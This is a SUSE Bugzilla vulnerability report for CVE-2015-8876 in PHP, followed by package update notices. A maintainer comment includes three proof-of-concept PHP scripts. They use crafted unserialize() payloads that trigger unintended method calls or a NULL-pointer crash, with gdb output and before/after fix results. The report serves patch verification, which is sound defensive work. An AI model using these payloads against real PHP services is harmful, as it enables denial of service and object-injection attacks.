Bugzilla – Bug 981049
VUL-0: CVE-2015-8876: php5, php53: Zend/zend_exceptions.c does not validate certain Exception objects
Last modified: 2016-08-10 07:22:18 UTC
CVE-2015-8876 Original release date: 05/21/2016 Last revised: 05/21/2016 Source: US-CERT/NIST Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 does not validate certain Exception objects, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or trigger unintended method execution via crafted serialized data. References: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8876 https://bugs.php.net/bug.php?id=70121
bugbot adjusting priority
Reproduced with 13.2 and 12. Installed packages: php5 $ cat poc1.php <?php /* $ php poc1.php unexpected */ class Pwn { function __toString() { die("surprise\n"); } } unserialize('O:12:"DateInterval":1:{s:4:"days";O:3:"Pwn":0:{}}'); ?> $ $ cat poc2.php <?php /*$ php poc2.php surprise 1 surprise 1 surprise 1 surprise 2 */ class Pwn { function __call($x,$y) { die("surprise 2\n"); } function __get($x) { echo "surprise 1\n"; } } unserialize('O:12:"DateInterval":1:{s:4:"days";O:9:"Exception":7:{s:10:"'."\0".'*'."\0".'message";s:1:"x";s:17:"'."\0".'Exception'."\0".'string";s:1:"A";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";s:1:"a";s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";O:3:"Pwn":0:{}}}'); ?> $ $ cat poc3.php <?php /* gdb$ r poc3.php Starting program: /usr/bin/php5 d.php PHP Notice: Undefined property: stdClass::$message in poc3.php on line 1 PHP Notice: Undefined property: stdClass::$file in poc3.php on line 1 PHP Notice: Undefined property: stdClass::$line in poc3.php on line 1 Program received signal SIGSEGV, Segmentation fault. 0x00000000006f52c8 in zim_exception___toString (ht=<optimized out>, return_value=0x7ffff7fc34d8, return_value_ptr=<optimized out>, this_ptr=0x7ffff7fc2f28, return_value_used=<optimized out>) at /build/php5-LRe0pE/php5-5.6.11+dfsg/Zend/zend_exceptions.c:673 673 if (Z_TYPE_P(trace) != IS_STRING) { gdb$ x/i $pc => 0x6f52c8 <zim_exception___toString+568>: cmp BYTE PTR [rax+0x14],0x6 gdb$ p $rax $1 = 0x0 */ unserialize('O:12:"DateInterval":1:{s:4:"days";O:9:"Exception":7:{s:10:"'."\0".'*'."\0".'message";s:1:"x";s:17:"'."\0".'Exception'."\0".'string";s:1:"A";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";s:1:"a";s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";O:8:"stdClass":0:{}}}'); ?> $ BEFORE $ php poc1.php surprise $ $ php poc2.php surprise 1 surprise 1 surprise 1 surprise 2 $ $ php poc3.php PHP Notice: Undefined property: stdClass::$message in /981049/poc3.php on line 22 PHP Notice: Undefined property: stdClass::$file in /981049/poc3.php on line 22 PHP Notice: Undefined property: stdClass::$line in /981049/poc3.php on line 22 Segmentation fault (core dumped) $ AFTER $ php poc1.php surprise $ php poc2.php $ php poc3.php $ You see that poc1.php still manifests the bug, but "First one is probably more a design issue than a flaw, by the way I'm quite positive that could be avoided or at least documented." So I am not spending more time on this, upstream probably had not fixed it, too. For 11sp3 and 11 seems not to be affected: $ php poc1.php PHP Notice: Object of class Pwn could not be converted to int in /981049/poc1.php on line 16 $ php poc2.php PHP Notice: Object of class Exception could not be converted to int in /981049/poc2.php on line 23 $ php poc3.php PHP Notice: Object of class Exception could not be converted to int in /981049/poc3.php on line 22 $
This is an autogenerated message for OBS integration: This bug (981049) was mentioned in https://build.opensuse.org/request/show/397708 13.2 / php5
Packages submitted.
This is an autogenerated message for OBS integration: This bug (981049) was mentioned in https://build.opensuse.org/request/show/399462 13.2 / php5
openSUSE-SU-2016:1553-1: An update that fixes 13 vulnerabilities is now available. Category: security (important) Bug References: 976775,980366,980373,980375,981049,981050,981061,982009,982010,982011,982012,982013,982162 CVE References: CVE-2013-7456,CVE-2015-4116,CVE-2015-8873,CVE-2015-8874,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-3074,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096,CVE-2016-5114 Sources used: openSUSE 13.2 (src): php5-5.6.1-66.1
SUSE-SU-2016:1633-1: An update that fixes 8 vulnerabilities is now available. Category: security (moderate) Bug References: 981049,981050,981061,982009,982010,982011,982012,982013 CVE References: CVE-2013-7456,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP1 (src): imap-2007e_suse-19.1 SUSE Linux Enterprise Workstation Extension 12 (src): imap-2007e_suse-19.1 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): imap-2007e_suse-19.1, php5-5.5.14-64.5 SUSE Linux Enterprise Software Development Kit 12 (src): imap-2007e_suse-19.1, php5-5.5.14-64.5 SUSE Linux Enterprise Module for Web Scripting 12 (src): imap-2007e_suse-19.1, php5-5.5.14-64.5 SUSE Linux Enterprise Desktop 12-SP1 (src): imap-2007e_suse-19.1 SUSE Linux Enterprise Desktop 12 (src): imap-2007e_suse-19.1
openSUSE-SU-2016:1688-1: An update that fixes 8 vulnerabilities is now available. Category: security (moderate) Bug References: 981049,981050,981061,982009,982010,982011,982012,982013 CVE References: CVE-2013-7456,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096 Sources used: openSUSE Leap 42.1 (src): imap-2007e_suse-22.1, php5-5.5.14-53.1
released